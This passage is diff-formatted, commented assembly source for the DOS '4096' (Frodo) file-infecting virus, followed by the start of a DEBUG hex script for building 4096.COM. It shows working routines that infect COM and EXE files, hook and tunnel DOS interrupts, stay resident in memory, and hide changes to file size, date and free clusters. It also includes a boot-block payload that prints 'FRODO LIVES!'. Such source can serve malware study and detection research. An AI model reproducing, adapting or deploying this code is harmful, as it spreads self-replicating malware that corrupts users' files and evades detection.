+                                                ; it will be too large once it
+                                                ; is infected
+                mov     ax,ds:readbuffer        ; first save first 6 bytes
+                mov     word ptr ds:oldheader,ax
+                add     dx,ax
+                mov     ax,ds:readbuffer+2
+                mov     word ptr ds:oldheader+2,ax
+                add     dx,ax
+                mov     ax,ds:readbuffer+4
+                mov     word ptr ds:oldheader+4,ax
+                add     dx,ax                   ; exit if checksum = 0
+                jz      exit_infect_file        ; since then it is already
+                                                ; infected
+                mov     cl,0E9h                 ; encode jmp instruction
+                mov     byte ptr ds:readbuffer,cl
+                mov     ax,10h                  ; find file size
+                mul     si
+                add     ax,offset entervirus-3  ; calculate offset of jmp
+                mov     word ptr ds:readbuffer+1,ax ; encode it
+                mov     ax,ds:readbuffer        ; checksum it to 0
+                add     ax,ds:readbuffer+2
+                neg     ax
+                mov     ds:readbuffer+4,ax
+                call    finish_infection
+exit_infect_file:
+                mov     ah,3Eh                  ; Close file
+                call    callint21
+                call    restoreint13and24
+                retn
+
+
+findnextparagraphboundary:
+                push    cs
+                pop     ds
+                mov     ax,5700h                ; Get file time/date
+                call    callint21
+                mov     ds:filetime,cx
+                mov     ds:filedate,dx
+                mov     ax,4200h                ; Go to beginning of file
+                xor     cx,cx
+                mov     dx,cx
+                call    callint21
+                mov     ah,3Fh                  ; Read first 1Ch bytes
+                mov     cl,1Ch
+                mov     dx,offset readbuffer
+                call    callint21
+                mov     ax,4200h                ; Go to beginning of file
+                xor     cx,cx
+                mov     dx,cx
+                call    callint21
+                mov     ah,3Fh                  ; Read first 1Ch bytes
+                mov     cl,1Ch
+                mov     dx,offset oldheader
+                call    callint21
+                mov     ax,4202h                ; Go to end of file
+                xor     cx,cx
+                mov     dx,cx
+                call    callint21
+                mov     ds:filesizelow,ax       ; save filesize
+                mov     ds:filesizehigh,dx
+                mov     di,ax
+                add     ax,0Fh                  ; round to nearest paragraph
+                adc     dx,0                    ; boundary
+                and     ax,0FFF0h
+                sub     di,ax                   ; di=# bytes to next paragraph
+                mov     cx,10h                  ; normalize filesize
+                div     cx                      ; to paragraphs
+                mov     si,ax                   ; si = result
+                retn
+
+
+finish_infection:
+                mov     ax,4200h                ; Go to beginning of file
+                xor     cx,cx
+                mov     dx,cx
+                call    callint21
+                mov     ah,40h                  ; Write new header to file
+                mov     cl,1Ch
+                mov     dx,offset readbuffer
+                call    callint21
+                mov     ax,10h                  ; convert paragraph boundary
+                mul     si                      ; to a byte value
+                mov     cx,dx
+                mov     dx,ax
+                mov     ax,4200h                ; go to first paragraph
+                call    callint21               ; boundary at end of file
+                xor     dx,dx
+                mov     cx,1000h
+                add     cx,di
+                mov     ah,40h                  ; Concatenate virus to file
+                call    callint21
+                mov     ax,5701h                ; Restore file time/date
+                mov     cx,ds:filetime
+                mov     dx,ds:filedate
+                test    dh,80h                  ; check for infection bit
+                jnz     highbitset
+                add     dh,0C8h                 ; alter if not set yet
+highbitset:
+                call    callint21
+                cmp     byte ptr ds:DOSversion,3; if not DOS 3+, then
+                jb      exit_finish_infection   ; do not hide the alteration
+                                                ; in cluster count
+                cmp     byte ptr ds:hideclustercountchange,0
+                je      exit_finish_infection
+                push    bx
+                mov     dl,ds:filedrive
+                mov     ah,32h                  ; Get drive parameter block
+                call    callint21               ; for drive dl
+                mov     ax,cs:numfreeclusters
+                mov     [bx+1Eh],ax             ; alter free cluster count
+                pop     bx
+exit_finish_infection:
+                retn
+
+
+checkFCBokinfect:
+                call    saveregs
+                mov     di,dx
+                add     di,0Dh                  ; skip to extension
+                push    ds
+                pop     es
+                jmp     short performchecksum   ; and check checksum for valid
+                                                ; checksum
+
+checkdsdxokinfect:
+                call    saveregs
+                push    ds
+                pop     es
+                mov     di,dx
+                mov     cx,50h                  ; max filespec length
+                xor     ax,ax
+                mov     bl,0                    ; default drive
+                cmp     byte ptr [di+1],':'     ; Is there a drive spec?
+                jne     ondefaultdrive          ; nope, skip it
+                mov     bl,[di]                 ; yup, get drive
+                and     bl,1Fh                  ; and convert to number
+ondefaultdrive:
+                mov     cs:filedrive,bl
+                repne   scasb                   ; find terminating 0 byte
+performchecksum:
+                mov     ax,[di-3]
+                and     ax,0DFDFh               ; convert to uppercase
+                add     ah,al
+                mov     al,[di-4]
+                and     al,0DFh                 ; convert to uppercase
+                add     al,ah
+                mov     byte ptr cs:EXEflag,0   ; assume COM file
+                cmp     al,0DFh                 ; COM checksum?
+                je      COMchecksum
+                inc     byte ptr cs:EXEflag     ; assume EXE file
+                cmp     al,0E2h                 ; EXE checksum?
+                jne     otherchecksum
+COMchecksum:
+                call    restoreregs
+                clc                             ; mark no error
+                retn
+otherchecksum:
+                call    restoreregs
+                stc                             ; mark error
+                retn
+
+
+getcurrentPSP:
+                push    bx
+                mov     ah,51h                  ; Get current PSP segment
+                call    callint21
+                mov     cs:currentPSP,bx        ; store it
+                pop     bx
+                retn
+
+
+setup_infection:
+                call    replaceint13and24
+                push    dx
+                mov     dl,cs:filedrive
+                mov     ah,36h                  ; Get disk free space
+                call    callint21
+                mul     cx                      ; ax = bytes per cluster
+                mul     bx                      ; dx:ax = bytes free space
+                mov     bx,dx
+                pop     dx
+                or      bx,bx                   ; less than 65536 bytes free?
+                jnz     enough_free_space       ; hopefully not
+                cmp     ax,4000h                ; exit if less than 16384
+                jb      exit_setup_infection    ; bytes free
+enough_free_space:
+                mov     ax,4300h                ; Get file attributes
+                call    callint21
+                jc      exit_setup_infection    ; exit on error
+                mov     di,cx                   ; di = attributes
+                xor     cx,cx
+                mov     ax,4301h                ; Clear file attributes
+                call    callint21
+                cmp     byte ptr cs:errorflag,0 ; check for errors
+                jne     exit_setup_infection
+                mov     ax,3D02h                ; Open file read/write
+                call    callint21
+                jc      exit_setup_infection    ; exit on error
+                mov     bx,ax                   ; move handle to bx
+                                                ; xchg bx,ax is superior
+                mov     cx,di
+                mov     ax,4301h                ; Restore file attributes
+                call    callint21
+                push    bx
+                mov     dl,cs:filedrive         ; Get file's drive number
+                mov     ah,32h                  ; Get drive parameter block
+                call    callint21               ; for disk dl
+                mov     ax,[bx+1Eh]             ; Get free cluster count
+                mov     cs:numfreeclusters,ax   ; and save it
+                pop     bx                      ; return handle
+                call    restoreint13and24
+                retn
+exit_setup_infection:
+                xor     bx,bx
+                dec     bx                      ; return bx=-1 on error
+                call    restoreint13and24
+                retn
+
+
+checkforinfection:
+                push    cx
+                push    dx
+                push    ax
+                mov     ax,4400h                ; Get device information
+                call    callint21               ; (set hide_size = 2)
+                xor     dl,80h
+                test    dl,80h                  ; Character device?  If so,
+                jz      exit_checkforinfection  ; exit; cannot be infected
+                mov     ax,5700h                ; Otherwise get time/date
+                call    callint21
+                test    dh,80h                  ; Check year bit for infection
+exit_checkforinfection:
+                pop     ax
+                pop     dx
+                pop     cx
+                retn
+
+obtainfilesize:
+                call    saveregs
+                mov     ax,4201h                ; Get current file position
+                xor     cx,cx
+                xor     dx,dx
+                call    callint21
+                mov     cs:curfileposlow,ax
+                mov     cs:curfileposhigh,dx
+                mov     ax,4202h                ; Go to end of file
+                xor     cx,cx
+                xor     dx,dx
+                call    callint21
+                mov     cs:filesizelow,ax
+                mov     cs:filesizehigh,dx
+                mov     ax,4200h                ; Return to file position
+                mov     dx,cs:curfileposlow
+                mov     cx,cs:curfileposhigh
+                call    callint21
+                call    restoreregs
+                retn
+
+getsetfiletimedate:
+                or      al,al                   ; Get time/date?
+                jnz     checkifsettimedate      ; if not, see if Set time/date
+                and     word ptr cs:int21flags,0FFFEh ; turn off trap flag
+                call    _popall
+                call    callint21
+                jc      gettimedate_error       ; exit on error
+                test    dh,80h                  ; check year bit if infected
+                jz      gettimedate_notinfected
+                sub     dh,0C8h                 ; if so, hide change
+gettimedate_notinfected:
+                jmp     exitint21
+gettimedate_error:
+                or      word ptr cs:int21flags,1; turn on trap flag
+                jmp     exitint21
+checkifsettimedate:
+                cmp     al,1                    ; Set time/date?
+                jne     exit_filetimedate_pointer
+                and     word ptr cs:int21flags,0FFFEh ; turn off trap flag
+                test    dh,80h                  ; Infection bit set?
+                jz      set_yearbitset
+                sub     dh,0C8h                 ; clear infection bit
+set_yearbitset:
+                call    checkforinfection
+                jz      set_datetime_nofinagle
+                add     dh,0C8h                 ; set infection flag
+set_datetime_nofinagle:
+                call    callint21
+                mov     [bp-4],ax
+                adc     word ptr cs:int21flags,0; turn on/off trap flag
+                jmp     _popall_then_exitint21  ; depending on result
+
+handlemovefilepointer:
+                cmp     al,2
+                jne     exit_filetimedate_pointer
+                call    checkforinfection
+                jz      exit_filetimedate_pointer
+                sub     word ptr [bp-0Ah],1000h ; hide file size
+                sbb     word ptr [bp-8],0
+exit_filetimedate_pointer:
+                jmp     exitotherint21
+
+handleread:
+                and     byte ptr cs:int21flags,0FEh ; clear trap flag
+                call    checkforinfection           ; exit if it is not
+                jz      exit_filetimedate_pointer   ; infected -- no need
+                                                    ; to do stealthy stuff
+                mov     cs:savelength,cx
+                mov     cs:savebuffer,dx
+                mov     word ptr cs:return_code,0
+                call    obtainfilesize
+                mov     ax,cs:filesizelow       ; store the file size
+                mov     dx,cs:filesizehigh
+                sub     ax,1000h                ; get uninfected file size
+                sbb     dx,0
+                sub     ax,cs:curfileposlow     ; check if currently in
+                sbb     dx,cs:curfileposhigh    ; virus code
+                jns     not_in_virus_body       ; continue if not
+                mov     word ptr [bp-4],0       ; set return code = 0
+                jmp     handleopenclose_exit
+not_in_virus_body:
+                jnz     not_reading_header
+                cmp     ax,cx                   ; reading from header?
+                ja      not_reading_header
+                mov     cs:savelength,ax        ; # bytes into header
+not_reading_header:
+                mov     dx,cs:curfileposlow
+                mov     cx,cs:curfileposhigh
+                or      cx,cx                   ; if reading > 64K into file,
+                jnz     finish_reading          ; then no problems
+                cmp     dx,1Ch                  ; if reading from header, then
+                jbe     reading_from_header     ; do stealthy stuff
+finish_reading:
+                mov     dx,cs:savebuffer
+                mov     cx,cs:savelength
+                mov     ah,3Fh                  ; read file
+                call    callint21
+                add     ax,cs:return_code       ; ax = bytes read
+                mov     [bp-4],ax               ; set return code properly
+                jmp     _popall_then_exitint21
+reading_from_header:
+                mov     si,dx
+                mov     di,dx
+                add     di,cs:savelength
+                cmp     di,1Ch                  ; reading all of header?
+                jb      read_part_of_header     ; nope, calculate how much
+                xor     di,di
+                jmp     short do_read_from_header
+read_part_of_header:
+                sub     di,1Ch
+                neg     di
+do_read_from_header:
+                mov     ax,dx
+                mov     cx,cs:filesizehigh      ; calculate location in
+                mov     dx,cs:filesizelow       ; the file of the virus
+                add     dx,0Fh                  ; storage area for the
+                adc     cx,0                    ; original 1Ch bytes of
+                and     dx,0FFF0h               ; the file
+                sub     dx,0FFCh
+                sbb     cx,0
+                add     dx,ax
+                adc     cx,0
+                mov     ax,4200h                ; go to that location
+                call    callint21
+                mov     cx,1Ch
+                sub     cx,di
+                sub     cx,si
+                mov     ah,3Fh                  ; read the original header
+                mov     dx,cs:savebuffer
+                call    callint21
+                add     cs:savebuffer,ax
+                sub     cs:savelength,ax
+                add     cs:return_code,ax
+                xor     cx,cx                   ; go past the virus's header
+                mov     dx,1Ch
+                mov     ax,4200h
+                call    callint21
+                jmp     finish_reading          ; and continue the reading
+
+handlewrite:
+                and     byte ptr cs:int21flags,0FEh ; turn off trap flag
+                call    checkforinfection
+                jnz     continue_handlewrite
+                jmp     exit_filetimedate_pointer
+continue_handlewrite:
+                mov     cs:savelength,cx
+                mov     cs:savebuffer,dx
+                mov     word ptr cs:return_code,0
+                call    obtainfilesize
+                mov     ax,cs:filesizelow
+                mov     dx,cs:filesizehigh
+                sub     ax,1000h                ; calculate original file
+                sbb     dx,0                    ; size
+                sub     ax,cs:curfileposlow     ; writing from inside the
+                sbb     dx,cs:curfileposhigh    ; virus?
+                js      finish_write            ; if not, we can continue
+                jmp     short write_inside_virus; otherwise, fixup some stuff
+finish_write:
+                call    replaceint13and24
+                push    cs
+                pop     ds
+                mov     dx,ds:filesizelow       ; calculate location in file
+                mov     cx,ds:filesizehigh      ; of the virus storage of the
+                add     dx,0Fh                  ; original 1Ch bytes of the
+                adc     cx,0                    ; file
+                and     dx,0FFF0h
+                sub     dx,0FFCh
+                sbb     cx,0
+                mov     ax,4200h
+                call    callint21
+                mov     dx,offset oldheader
+                mov     cx,1Ch
+                mov     ah,3Fh                  ; read original header
+                call    callint21
+                mov     ax,4200h                ; go to beginning of file
+                xor     cx,cx
+                mov     dx,cx
+                call    callint21
+                mov     dx,offset oldheader
+                mov     cx,1Ch
+                mov     ah,40h                  ; write original header to
+                call    callint21               ; the file
+                mov     dx,0F000h               ; go back 4096 bytes
+                mov     cx,0FFFFh               ; from the end of the
+                mov     ax,4202h                ; file and
+                call    callint21
+                mov     ah,40h                  ; truncate the file
+                xor     cx,cx                   ; at that position
+                call    callint21
+                mov     dx,ds:curfileposlow     ; Go to current file position
+                mov     cx,ds:curfileposhigh
+                mov     ax,4200h
+                call    callint21
+                mov     ax,5700h                ; Get file time/date
+                call    callint21
+                test    dh,80h
+                jz      high_bit_aint_set
+                sub     dh,0C8h                 ; restore file date
+                mov     ax,5701h                ; put it onto the disk
+                call    callint21
+high_bit_aint_set:
+                call    restoreint13and24
+                jmp     exitotherint21
+write_inside_virus:
+                jnz     write_inside_header     ; write from start of file?
+                cmp     ax,cx
+                ja      write_inside_header     ; write from inside header?
+                jmp     finish_write
+
+write_inside_header:
+                mov     dx,cs:curfileposlow
+                mov     cx,cs:curfileposhigh
+                or      cx,cx                   ; Reading over 64K?
+                jnz     writemorethan1Chbytes
+                cmp     dx,1Ch                  ; Reading over 1Ch bytes?
+                ja      writemorethan1Chbytes
+                jmp     finish_write
+writemorethan1Chbytes:
+                call    _popall
+                call    callint21               ; chain to int 21h
+                                                ; (allow write to take place)
+                call    _pushall
+                mov     ax,5700h                ; Get file time/date
+                call    callint21
+                test    dh,80h
+                jnz     _popall_then_exitint21_
+                add     dh,0C8h
+                mov     ax,5701h                ; restore file date
+                call    callint21
+_popall_then_exitint21_:
+                jmp     _popall_then_exitint21
+
+                jmp     exitotherint21
+
+int13:
+                pop     word ptr cs:int13tempCSIP ; get calling CS:IP off
+                pop     word ptr cs:int13tempCSIP+2 ; the stack
+                pop     word ptr cs:int13flags
+                and     word ptr cs:int13flags,0FFFEh ; turn off trap flag
+                cmp     byte ptr cs:errorflag,0 ; any errors yet?
+                jne     exitint13error          ; yes, already an error
+                push    word ptr cs:int13flags
+                call    dword ptr cs:origints
+                jnc     exitint13
+                inc     byte ptr cs:errorflag   ; mark error
+exitint13error:
+                stc                             ; mark error
+exitint13:
+                jmp     dword ptr cs:int13tempCSIP ; return to caller
+
+int24:
+                xor     al,al                   ; ignore error
+                mov     byte ptr cs:errorflag,1 ; mark error
+                iret
+
+replaceint13and24:
+                mov     byte ptr cs:errorflag,0 ; clear errors
+                call    saveregs
+                push    cs
+                pop     ds
+                mov     al,13h                  ; save int 13 handler
+                call    getint
+                mov     word ptr ds:origints,bx
+                mov     word ptr ds:origints+2,es
+                mov     word ptr ds:oldint13,bx
+                mov     word ptr ds:oldint13+2,es
+                mov     dl,0
+                mov     al,0Dh                  ; fixed disk interrupt
+                call    getint
+                mov     ax,es
+                cmp     ax,0C000h               ; is there a hard disk?
+                jae     harddiskpresent         ; C000+ is in BIOS
+                mov     dl,2
+harddiskpresent:
+                mov     al,0Eh                  ; floppy disk interrupt
+                call    getint
+                mov     ax,es
+                cmp     ax,0C000h               ; check if floppy
+                jae     floppypresent
+                mov     dl,2
+floppypresent:
+                mov     ds:tracemode,dl
+                call    replaceint1
+                mov     ds:savess,ss            ; save stack
+                mov     ds:savesp,sp
+                push    cs                      ; save these on stack for
+                mov     ax,offset setvirusints  ; return to setvirusints
+                push    ax
+                mov     ax,70h
+                mov     es,ax
+                mov     cx,0FFFFh
+                mov     al,0CBh                 ; retf
+                xor     di,di
+                repne   scasb                   ;scan es:di for retf statement
+                dec     di                      ; es:di->retf statement
+                pushf
+                push    es                      ; set up stack for iret to
+                push    di                      ; the retf statement which
+                                                ; will cause transfer of
+                                                ; control to setvirusints
+                pushf
+                pop     ax
+                or      ah,1                    ; turn on the trap flag
+                push    ax
+                in      al,21h                  ; save IMR in temporary
+                mov     ds:saveIMR,al           ; buffer and then
+                mov     al,0FFh                 ; disable all the
+                out     21h,al                  ; interrupts
+                popf
+                xor     ax,ax                   ; reset disk
+                jmp     dword ptr ds:origints   ; (int 13h call)
+                                                ; then transfer control to
+setvirusints:                                   ; setvirusints
+                lds     dx,dword ptr ds:oldint1
+                mov     al,1                    ; restore old int 1 handler
+                call    setvect
+                push    cs
+                pop     ds
+                mov     dx,offset int13         ; replace old int 13h handler
+                mov     al,13h                  ; with virus's
+                call    setvect
+                mov     al,24h                  ; Get old critical error
+                call    getint                  ; handler and save its
+                mov     word ptr ds:oldint24,bx ; location
+                mov     word ptr ds:oldint24+2,es
+                mov     dx,offset int24
+                mov     al,24h                  ; Replace int 24 handler
+                call    setvect                 ; with virus's handler
+                call    restoreregs
+                retn
+
+
+restoreint13and24:
+                call    saveregs
+                lds     dx,dword ptr cs:oldint13
+                mov     al,13h
+                call    setvect
+                lds     dx,dword ptr cs:oldint24
+                mov     al,24h
+                call    setvect
+                call    restoreregs
+                retn
+
+
+disableBREAK:
+                mov     ax,3300h                ; Get current BREAK setting
+                call    callint21
+                mov     cs:BREAKsave,dl
+                mov     ax,3301h                ; Turn BREAK off
+                xor     dl,dl
+                call    callint21
+                retn
+
+
+restoreBREAK:
+                mov     dl,cs:BREAKsave
+                mov     ax,3301h                ; restore BREAK setting
+                call    callint21
+                retn
+
+
+_pushall:
+                pop     word ptr cs:pushpopalltempstore
+                pushf
+                push    ax
+                push    bx
+                push    cx
+                push    dx
+                push    si
+                push    di
+                push    ds
+                push    es
+                jmp     word ptr cs:pushpopalltempstore
+
+swapvirint21:
+                les     di,dword ptr cs:oldint21; delve into original int
+                mov     si,offset jmpfarptr     ; handler and swap the first
+                push    cs                      ; 5 bytes.  This toggles it
+                pop     ds                      ; between a jmp to the virus
+                cld                             ; code and the original 5
+                mov     cx,5                    ; bytes of the int handler
+swapvirint21loop:                               ; this is a tunnelling method
+                lodsb                           ; if I ever saw one
+                xchg    al,es:[di]              ; puts the bytes in DOS's
+                mov     [si-1],al               ; int 21h handler
+                inc     di
+                loop    swapvirint21loop
+
+                retn
+
+
+_popall:
+                pop     word ptr cs:pushpopalltempstore
+                pop     es
+                pop     ds
+                pop     di
+                pop     si
+                pop     dx
+                pop     cx
+                pop     bx
+                pop     ax
+                popf
+                jmp     word ptr cs:pushpopalltempstore
+
+restoreregs:
+                mov     word ptr cs:storecall,offset _popall
+                jmp     short do_saverestoreregs
+
+saveregs:
+                mov     word ptr cs:storecall,offset _pushall
+do_saverestoreregs:
+                mov     cs:storess,ss           ; save stack
+                mov     cs:storesp,sp
+                push    cs
+                pop     ss
+                mov     sp,cs:stackptr          ; set new stack
+                call    word ptr cs:storecall
+                mov     cs:stackptr,sp          ; update internal stack ptr
+                mov     ss,cs:storess           ; and restore stack to
+                mov     sp,cs:storesp           ; caller program's stack
+                retn
+
+
+replaceint1:
+                mov     al,1                    ; get the old interrupt
+                call    getint                  ; 1 handler and save it
+                mov     word ptr cs:oldint1,bx  ; for later restoration
+                mov     word ptr cs:oldint1+2,es
+                push    cs
+                pop     ds
+                mov     dx,offset int1          ; set int 1 handler to
+                call    setvect                 ; the virus int handler
+                retn
+
+allocatememory:
+                call    allocate_memory
+                jmp     exitotherint21
+
+allocate_memory:
+                cmp     byte ptr cs:checkres,0  ; installed check
+                je      exitallocate_memory     ; exit if installed
+                cmp     bx,0FFFFh               ; finding total memory?
+                jne     exitallocate_memory     ; (virus trying to install?)
+                mov     bx,160h                 ; allocate memory to virus
+                call    callint21
+                jc      exitallocate_memory     ; exit on error
+                mov     dx,cs
+                cmp     ax,dx
+                jb      continue_allocate_memory
+                mov     es,ax
+                mov     ah,49h                  ; Free memory
+                call    callint21
+                jmp     short exitallocate_memory
+continue_allocate_memory:
+                dec     dx                      ; get segment of MCB
+                mov     ds,dx
+                mov     word ptr ds:[1],0       ; mark unused MCB
+                inc     dx                      ; go to memory area
+                mov     ds,dx
+                mov     es,ax
+                push    ax
+                mov     word ptr cs:int21store+2,ax ; fixup segment
+                xor     si,si
+                mov     di,si
+                mov     cx,0B00h
+                rep     movsw                   ; copy virus up there
+                dec     ax                      ; go to MCB
+                mov     es,ax
+                mov     ax,cs:ownerfirstMCB     ; get DOS PSP ID
+                mov     es:[1],ax               ; make vir ID = DOS PSP ID
+                mov     ax,offset exitallocate_memory
+                push    ax
+                retf
+
+exitallocate_memory:
+                retn
+
+get_device_info:
+                mov     byte ptr cs:hide_size,2
+                jmp     exitotherint21
+
+callint21: ; call original int 21h handler (tunnelled)
+                pushf
+                call    dword ptr cs:oldint21
+                retn
+
+bootblock:
+                cli
+                xor     ax,ax                   ; set new stack just below
+                mov     ss,ax                   ; start of load area for
+                mov     sp,7C00h                ; boot block
+                jmp     short enter_bootblock
+borderchars     db      '��� '
+
+FRODO_LIVES: ; bitmapped 'FRODO LIVES!'
+                db      11111001b,11100000b,11100011b,11000011b,10000000b
+                db      10000001b,00010001b,00010010b,00100100b,01000000b
+                db      10000001b,00010001b,00010010b,00100100b,01000000b
+                db      11110001b,11110001b,00010010b,00100100b,01000000b
+                db      10000001b,00100001b,00010010b,00100100b,01000000b
+                db      10000001b,00010000b,11100011b,11000011b,10000000b
+                db      00000000b,00000000b,00000000b,00000000b,00000000b
+                db      00000000b,00000000b,00000000b,00000000b,00000000b
+                db      10000010b,01000100b,11111000b,01110000b,11000000b
+                db      10000010b,01000100b,10000000b,10001000b,11000000b
+                db      10000010b,01000100b,10000000b,10000000b,11000000b
+                db      10000010b,01000100b,11110000b,01110000b,11000000b
+                db      10000010b,00101000b,10000000b,00001000b,11000000b
+                db      10000010b,00101000b,10000000b,10001000b,00000000b
+                db      11110010b,00010000b,11111000b,01110000b,11000000b
+enter_bootblock:
+                push    cs
+                pop     ds
+                mov     dx,0B000h               ; get video page in bh
+                mov     ah,0Fh                  ; get video mode in al
+                int     10h                     ; get columns in ah
+
+                cmp     al,7                    ; check if colour
+                je      monochrome
+                mov     dx,0B800h               ; colour segment
+monochrome:
+                mov     es,dx                   ; es->video segment
+                cld
+                xor     di,di
+                mov     cx,25*80                ; entire screen
+                mov     ax,720h                 ; ' ', normal attribute
+                rep     stosw                   ; clear the screen
+                mov     si,7C00h+FRODO_LIVES-bootblock
+                mov     bx,2AEh
+morelinestodisplay:
+                mov     bp,5
+                mov     di,bx
+displaymorebackgroundontheline:
+                lodsb                           ; get background pattern
+                mov     dh,al
+                mov     cx,8
+
+displayinitialbackground:
+                mov     ax,720h
+                shl     dx,1
+                jnc     spacechar
+                mov     al,'�'
+spacechar:
+                stosw
+                loop    displayinitialbackground
+
+                dec     bp
+                jnz     displaymorebackgroundontheline
+                add     bx,80*2                 ; go to next line
+                cmp     si,7C00h+enter_bootblock-bootblock
+                jb      morelinestodisplay
+                mov     ah,1                    ; set cursor mode to cx
+                int     10h
+
+                mov     al,8                    ; set new int 8 handler
+                mov     dx,7C00h+int8-bootblock ; to spin border
+                call    setvect
+                mov     ax,7FEh                 ; enable timer interrupts only
+                out     21h,al
+
+                sti
+                xor     bx,bx
+                mov     cx,1
+                jmp     short $                 ; loop forever while
+                                                ; spinning the border
+
+int8:                                           ; the timer interrupt spins
+                dec     cx                      ; the border
+                jnz     endint8
+                xor     di,di
+                inc     bx
+                call    spin_border
+                call    spin_border
+                mov     cl,4                    ; wait 4 more ticks until
+endint8:                                        ; next update
+                mov     al,20h                  ; Signal end of interrupt
+                out     20h,al
+                iret
+
+spin_border:
+                mov     cx,28h                  ; do 40 characters across
+
+dohorizontal:
+                call    lookup_border_char
+                stosw
+                stosw
+                loop    dohorizontal
+patch2:
+                add     di,9Eh                  ; go to next line
+                mov     cx,17h                  ; do for next 23 lines
+
+dovertical:                                     ; handle vertical borders
+                call    lookup_border_char      ; get border character
+                stosw                           ; print it on screen
+patch3:
+                add     di,9Eh                  ; go to next line
+                loop    dovertical
+patch1:
+                std
+        ; this code handles the other half of the border
+                xor     byte ptr ds:[7C00h+patch1-bootblock],1 ; flip std,cld
+                xor     byte ptr ds:[7C00h+patch2-bootblock+1],28h
+                xor     byte ptr ds:[7C00h+patch3-bootblock+1],28h
+                retn
+
+
+lookup_border_char:
+                and     bx,3                    ; find corresponding border
+                mov     al,ds:[bx+7C00h+borderchars-bootblock]
+                inc     bx                      ; character
+                retn
+
+
+setvect:
+                push    es
+                push    bx
+                xor     bx,bx
+                mov     es,bx
+                mov     bl,al                   ; int # to bx
+                shl     bx,1                    ; int # * 4 = offset in
+                shl     bx,1                    ; interrupt table
+                mov     es:[bx],dx              ; set the vector in the
+                mov     es:[bx+2],ds            ; interrupt table
+                pop     bx
+                pop     es
+                retn
+
+
+writebootblock: ; this is an unfinished subroutine; it doesn't work properly
+                call    replaceint13and24
+                mov     dl,80h
+                db      0E8h, 08h, 00h, 32h,0D2h,0E8h
+                db       03h, 01h, 00h, 9Ah, 0Eh, 32h
+                db       08h, 70h, 00h, 33h, 0Eh, 2Eh
+                db       03h, 6Ch, 15h, 03h, 00h, 26h
+                db       00h, 00h, 00h, 21h, 00h, 50h
+                db       12h, 65h, 14h, 82h, 08h, 00h
+                db       0Ch, 9Ah, 0Eh, 56h, 07h, 70h
+                db       00h, 33h, 0Eh, 2Eh, 03h, 6Ch
+                db       15h,0E2h, 0Ch, 1Eh, 93h, 00h
+                db       00h,0E2h, 0Ch, 50h
+
+                org 1200h
+readbuffer      dw      ? ; beginning of the read buffer
+lengthMOD512    dw      ? ; EXE header item - length of image modulo 512
+lengthinpages   dw      ? ; EXE header item - length of image in pages
+relocationitems dw      ? ; EXE header item - # relocation items
+headersize      dw      ? ; EXE header item - header size in paragraphs
+minmemory       dw      ? ; EXE header item - minimum memory allocation
+maxmemory       dw      ? ; EXE header item - maximum memory allocation
+initialSS       dw      ? ; EXE header item - initial SS value
+initialSP       dw      ? ; EXE header item - initial SP value
+wordchecksum    dw      ? ; EXE header item - checksum value
+initialIP       dw      ? ; EXE header item - initial IP value
+initialCS       dw      ? ; EXE header item - initial CS value
+                db      12 dup (?) ; rest of header - unused
+parmblock       dd      ? ; address of parameter block
+filedrive       db      ? ; 0 = default drive
+filetime        dw      ? ; saved file time
+filedate        dw      ? ; saved file date
+origints        dd      ? ; temporary scratch buffer for interrupt vectors
+oldint1         dd      ? ; original interrupt 1 vector
+oldint21        dd      ? ; original interrupt 21h vector
+oldint13        dd      ? ; original interrupt 13h vector
+oldint24        dd      ? ; original interrupt 24h vector
+int13tempCSIP   dd      ? ; stores calling CS:IP of int 13h
+carrierPSP      dw      ? ; carrier file PSP segment
+DOSsegment      dw      ? ; segment of DOS list of lists
+ownerfirstMCB   dw      ? ; owner of the first MCB
+jmpfarptr       db      ? ; 0eah, jmp far ptr
+int21store      dd      ? ; temporary storage for other 4 bytes
+                          ; and for pointer to virus int 21h
+tracemode       db      ? ; trace mode
+instructionstotrace  db ? ; number of instructions to trace
+handletable     dw      28h dup (?) ; array of handles
+handlesleft     db      ? ; entries left in table
+currentPSP      dw      ? ; storage for the current PSP segment
+curfileposlow   dw      ? ; current file pointer location, low word
+curfileposhigh  dw      ? ; current file pointer location, high word
+filesizelow     dw      ? ; current file size, low word
+filesizehigh    dw      ? ; current file size, high word
+savebuffer      dw      ? ; storage for handle read, etc.
+savelength      dw      ? ; functions
+return_code     dw      ? ; returned in AX on exit of int 21h
+int21flags      dw      ? ; storage of int 21h return flags register
+tempFCB         db      25h dup (?) ; copy of the FCB
+errorflag       db      ? ; 0 if no error, 1 if error
+int13flags      dw      ? ; storage of int 13h return flags register
+savess          dw      ? ; temporary storage of stack segment
+savesp          dw      ? ; and stack pointer
+BREAKsave       db      ? ; current BREAK state
+checkres        db      ? ; already installed flag
+initialax       dw      ? ; AX upon entry to carrier
+saveIMR         db      ? ; storage for interrupt mask register
+saveoffset      dw      ? ; temp storage of CS:IP of
+savesegment     dw      ? ; caller to int 21h
+pushpopalltempstore  dw ? ; push/popall caller address
+numfreeclusters dw      ? ; total free clusters
+DOSversion      db      ? ; current DOS version
+hideclustercountchange db ? ; flag of whether to hide free cluster count
+hide_size       db      ? ; hide filesize increase if equal to 0
+copyparmblock   db      0eh dup (?) ; copy of the parameter block
+origsp          dw      ? ; temporary storage of stack pointer
+origss          dw      ? ; and stack segment
+origcsip        dd      ? ; temporary storage of caller CS:IP
+copyfilename    db      50h dup (?) ; copy of filename
+storesp         dw      ? ; temporary storage of stack pointer
+storess         dw      ? ; and stack segment
+stackptr        dw      ? ; register storage stack pointer
+storecall       dw      ? ; temporary storage of function offset
+
+topstack = 1600h
+
+_4096           ends
+                end
+-------------------------------------<CUT>-------------------------------------
+N 4096.COM
+E 0100 00 E9 A7 00 C3 75 02 44 15 46 20 43 6F 70 79 72
+E 0110 69 67 68 74 20 42 6F 75 72 62 25 7D 69 2C 20 49 
+E 0120 00 FE 3A 55 8B EC 50 81 7E 04 00 C0 73 0C 2E A1 
+E 0130 47 12 39 46 04 76 03 58 5D CF 2E 80 3E 50 12 01 
+E 0140 74 32 8B 46 04 2E A3 2F 12 8B 46 02 2E A3 2D 12 
+E 0150 72 15 58 5D 2E 8E 16 DD 12 2E 8B 26 DF 12 2E A0 
+E 0160 E5 12 E6 21 E9 D9 0C 81 66 06 FF FE 2E A0 E5 12 
+E 0170 E6 21 EB C3 2E FE 0E 51 12 75 BC 81 66 06 FF FE 
+E 0180 E8 6C 0D E8 34 0D 2E C5 16 31 12 B0 01 E8 0C 0F 
+E 0190 E8 53 0D EB D2 1E 56 33 F6 8E DE 32 E4 8B F0 D1 
